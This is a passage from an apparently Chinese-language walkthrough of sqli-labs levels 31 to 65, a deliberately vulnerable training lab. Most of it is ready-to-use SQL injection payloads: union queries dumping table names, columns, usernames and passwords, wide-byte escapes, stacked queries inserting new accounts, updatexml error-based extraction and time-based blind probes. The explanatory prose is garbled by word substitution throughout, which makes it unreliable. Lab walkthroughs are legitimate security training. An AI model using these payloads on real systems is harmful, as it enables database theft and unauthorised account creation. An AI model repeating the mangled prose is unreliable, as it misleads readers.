####?id=1&id=-2")%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=1&id=-2")%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name='users'--+ 爆字段 ?id=1&id=-2")%20union%20select%201,group_concat(password,username),3%20from%20users--+

32.sqli-labs第三十二關(guān)

第三十二關(guān)應(yīng)用preg_replace函數(shù)將 斜杠，單引號(hào)跟雙引號(hào)過濾了，假如輸入id=1"會(huì)釀成id=1\",使得引號(hào)不起感化，然而能夠留神到數(shù)據(jù)庫應(yīng)用了gbk編碼。這里咱們能夠采取寬字節(jié)注入。當(dāng)某字符的巨細(xì)為一個(gè)字節(jié)時(shí)，稱其字符為窄字節(jié)當(dāng)某字符的巨細(xì)為兩個(gè)字節(jié)時(shí)，稱其字符為寬字節(jié)。全部英文默許占一個(gè)字節(jié)，漢字占兩個(gè)字節(jié)。

####?id=-1%df%27%20union%20select%201,database(),3%20--+ ?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+ 爆字段 ?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

33.sqli-labs第三十三關(guān)

第三十二關(guān)跟三十三關(guān)截然不同

34.sqli-labs第三十四關(guān)

三十四關(guān)是post提交，應(yīng)用addslashes函數(shù)對(duì)賬戶跟暗碼都停止本義，應(yīng)用寬字節(jié)注入就行。

####1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+ 爆字段名 1%df%27 union select 1,group_concat(password,username) from users--+ 爆暗碼賬戶

35.sqli-labs第三十五關(guān)

應(yīng)用addslashes函數(shù)對(duì)輸入的內(nèi)亂容停止本義，然而id參數(shù)不引號(hào)，重要影響在與后續(xù)爆字段時(shí)間須要用的表名加了引號(hào)，只要將表名換成十六進(jìn)制編碼就行，直接應(yīng)用結(jié)合查問就能夠了

####?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表 ?id=-1%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+ 爆字段 ?id=-1%20union%20select%201,group_concat(password,username),3%20from%20users--+

36.sqli-labs第三十六關(guān)

應(yīng)用mysql_real_escape_string函數(shù)對(duì)特別字符停止本義。id參數(shù)是單引號(hào)，跟后面三十二關(guān)一樣

37.sqli-labs第三十七關(guān)

三十七關(guān)是post提交，應(yīng)用mysql_real_escape_string函數(shù)對(duì)賬戶跟暗碼都停止本義，應(yīng)用寬字節(jié)注入就行。跟三十四關(guān)一樣。

####1%df' union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273--+ 爆字段名 1%df' union select 1,group_concat(password,username) from users--+ 爆暗碼賬戶

38.sqli-labs第三十八關(guān)

三十八關(guān)實(shí)在就是單引號(hào)閉合，應(yīng)用畸形單引號(hào)閉合就能夠停止注入，不外這里能夠有別的一種注入就是重疊注入，由于存在mysqli_multi_query函數(shù)，該函數(shù)支撐多條sql語句同時(shí)停止。

####?id=1';insert into users(id,username,password) values ('38','less38','hello')--+ #向數(shù)據(jù)表拔出本人的賬戶暗碼

####?id=-1' union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database())b--+ 查問字段 ?id=-1' union select 1,2,(select group_concat(username,password) from users)b--+ 查問暗碼賬戶

39.sqli-labs第三十九關(guān)

id參數(shù)是整數(shù)，畸形結(jié)合注入就行。

####?id=-1%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database() ?id=-1%20union%20select%201,group_concat(username,password),3%20from%20users

40.sqli-labs第四十關(guān)

四十關(guān)id參數(shù)是單引號(hào)加括號(hào)閉合，而后應(yīng)用結(jié)合注入就能夠了

####?id=-1%27)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ ?id=-1%27)%20union%20select%201,group_concat(username,password),3%20from%20users%20--+

41.sqli-labs第四十一關(guān)

四十一關(guān)跟三十九關(guān)一樣，id是整數(shù)。

42.sqli-labs第四十二關(guān)

四十二關(guān)是由于賬戶停止了本義處置暗碼不做處置，數(shù)據(jù)庫不應(yīng)用gbk編碼不克不及向下面一樣應(yīng)用寬字節(jié)注入，然而存在重疊注入函數(shù)，以是咱們能夠在暗碼那里應(yīng)用重疊注入。向數(shù)據(jù)庫外面拔出暗碼賬號(hào)，如許咱們?cè)賮響?yīng)用其停止登錄就很簡略了。

####login_user=1&login_password=1';insert into users(id,username,password) values ('39','less30','123456')--+&mysubmit=Login

43.sqli-labs第四十三關(guān)

四十三關(guān)跟四十二關(guān)差未幾，就是暗碼參數(shù)是單引號(hào)跟括號(hào)閉合的。

####login_user=1&login_password=1'); insert into users(id,username,password) values ('44','less34','123456')--+&mysubmit=Login

44.sqli-labs第四十四關(guān)

四十四關(guān)跟四十二關(guān)一樣

45.sqli-labs第四十五關(guān)

四十五關(guān)跟四十三關(guān)一樣

46.sqli-labs第四十六關(guān)

應(yīng)用新的參數(shù)sort，經(jīng)由過程輸入1，2，3表中呈現(xiàn)差別數(shù)據(jù)，該sql語句是order by，sql語句參數(shù)不引號(hào)且不克不及應(yīng)用結(jié)合注入，有報(bào)錯(cuò)表現(xiàn)，以是咱們能夠應(yīng)用updatexml停止報(bào)錯(cuò)。

####?sort=1%20and%20(updatexml(1,concat(0x5c,(select%20group_concat(password,username)%20from%20users),0x5c),1))

47.sqli-labs第四十七關(guān)

四十七關(guān)跟四十六差未幾，多了一個(gè)單引號(hào)閉合，能夠應(yīng)用報(bào)錯(cuò)注入

48.sqli-labs第四十八關(guān)

四十八關(guān)跟四十六一樣只不外不報(bào)錯(cuò)表現(xiàn)，以是應(yīng)用延時(shí)注入。

49.sqli-labs第四十九關(guān)

四十九關(guān)跟四十七關(guān)一樣，不外不報(bào)錯(cuò)表現(xiàn)，以是應(yīng)用延時(shí)注入。

50.sqli-labs第五十關(guān)

五十關(guān)跟四十六關(guān)一樣，能夠應(yīng)用updatexml停止報(bào)錯(cuò)注入，不外這個(gè)外面還能夠應(yīng)用重疊注入，由于應(yīng)用了mysqli_multi_query函數(shù)，支撐多條sql語句履行。也能夠延時(shí)注入。能夠鑒戒三十八代碼

51.sqli-labs第五十一關(guān)

該參數(shù)單引號(hào)閉合，能夠報(bào)錯(cuò)注入，能夠延時(shí)注入，能夠重疊注入。

52.sqli-labs第五十二關(guān)

該參數(shù)是整數(shù)型，且不報(bào)錯(cuò)表現(xiàn)，只能重疊注入或許延時(shí)注入。

53.sqli-labs第五十三關(guān)

該參數(shù)是字符型，單引號(hào)閉合，不報(bào)錯(cuò)表現(xiàn)，能夠應(yīng)用重疊注入跟延時(shí)注入。

54.sqli-labs第五十四關(guān)

五十四關(guān)翻譯頁面的英文，得悉只有十次輸入機(jī)遇，超越十次全部表名，列名，等等都市隨機(jī)重置。id參數(shù)是單引號(hào)閉合就行。

####?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+ 爆表名

?留神下面這個(gè)是我查到的表名，每團(tuán)體紛歧樣的表名，代碼須要變動(dòng)表名

####?id=-1'union select 1,group_concat(column_name),3 from information_schema.columns where%20table_schema=database() and table_name='8fof1zun81'--+ 爆列名

字段名也是紛歧樣的，咱們須要獲取secret_31F4，以是每團(tuán)體的列名也須要改。?

?id=-1%27union%20select%201,group_concat(secret_31F4),3%20from%208fof1zun81--+ 獲取key值

將獲取的key值放到上面輸入框點(diǎn)擊提交，就實(shí)現(xiàn)全部步調(diào)。

55.sqli-labs第五十五關(guān)

五十五關(guān)是有14次機(jī)遇，id參數(shù)是加了括號(hào)的整數(shù)

####?id=-1)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 報(bào)表名 ?id=-1) union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='69jwmv27j9'--+ 爆列名 ?id=-1) union select 1,group_concat(secret_D1DW),3 from 69jwmv27j9--+ 獲取key值

56.sqli-labs第五十六關(guān)

五十六關(guān)跟后面兩關(guān)相似須要單引號(hào)跟括號(hào)。

####？id=-1')%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+ 爆表名 ?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='9ze4qmv307'--+ 爆列名 ?id=-1') union select 1,group_concat(secret_CTVR),3 from 9ze4qmv307--+ 獲取key值

57.sqli-labs第五十七關(guān)

五十七關(guān)就是雙引號(hào)閉合?

58.sqli-labs第五十八關(guān)

五十八關(guān)跟后面多少關(guān)紛歧樣，由于該關(guān)卡的數(shù)據(jù)不是直接數(shù)據(jù)庫外面獲得，而是在一個(gè)數(shù)組外面掏出得。以是結(jié)合注入是不可得。然而有報(bào)錯(cuò)表現(xiàn)，以是能夠應(yīng)用報(bào)錯(cuò)注入。

##?id=1' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges'),0x7e),1)--+ 爆表名

?

##?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='8edjk8ipbk'),0x7e),1)--+ 爆列名

?

##?id=1' and updatexml(1,concat(0x7e,(select group_concat(secret_6W8M) from challenges.8edjk8ipbk),0x7e),1)--+

59.sqli-labs第五十九關(guān)

五十九關(guān)跟五十八關(guān)一樣應(yīng)用報(bào)錯(cuò)注入，id是整數(shù)型。

60.sqli-labs第六十關(guān)

六十關(guān)依據(jù)報(bào)錯(cuò)信息可知id參數(shù)是雙引號(hào)加括號(hào)。

61.sqli-labs第六十一關(guān)

六十一關(guān)依據(jù)報(bào)錯(cuò)信息可知id參數(shù)是單引號(hào)加兩個(gè)括號(hào)。

62.sqli-labs第六十二關(guān)

六十二關(guān)不報(bào)錯(cuò)表現(xiàn)，能夠應(yīng)用布爾盲注跟時(shí)光注入。id參數(shù)是單引號(hào)加括號(hào)。詳細(xì)代碼往上翻

第五關(guān)（布爾盲注），第九關(guān)（時(shí)光注入）

##?id=1%27) and if(length((select database()))=10,sleep(5),1)--+ 時(shí)光注入，假如呈現(xiàn)耽誤表現(xiàn)該數(shù)據(jù)庫名長度是10 ?id=1%27)and length((select database()))=10--+ 布爾盲注

63.sqli-labs第六十三關(guān)

?六十三關(guān)不報(bào)錯(cuò)表現(xiàn)，能夠應(yīng)用布爾盲注跟時(shí)光注入。id參數(shù)是單引號(hào)。第五關(guān)（布爾盲注），第九關(guān)（時(shí)光注入）

64.sqli-labs第六十四關(guān)

跟后面兩關(guān)一樣，id參數(shù)是兩個(gè)括號(hào)的整數(shù)型。

65.sqli-labs第六十五關(guān)

?跟后面關(guān)卡差未幾，id參數(shù)是一個(gè)括號(hào)的整數(shù)型。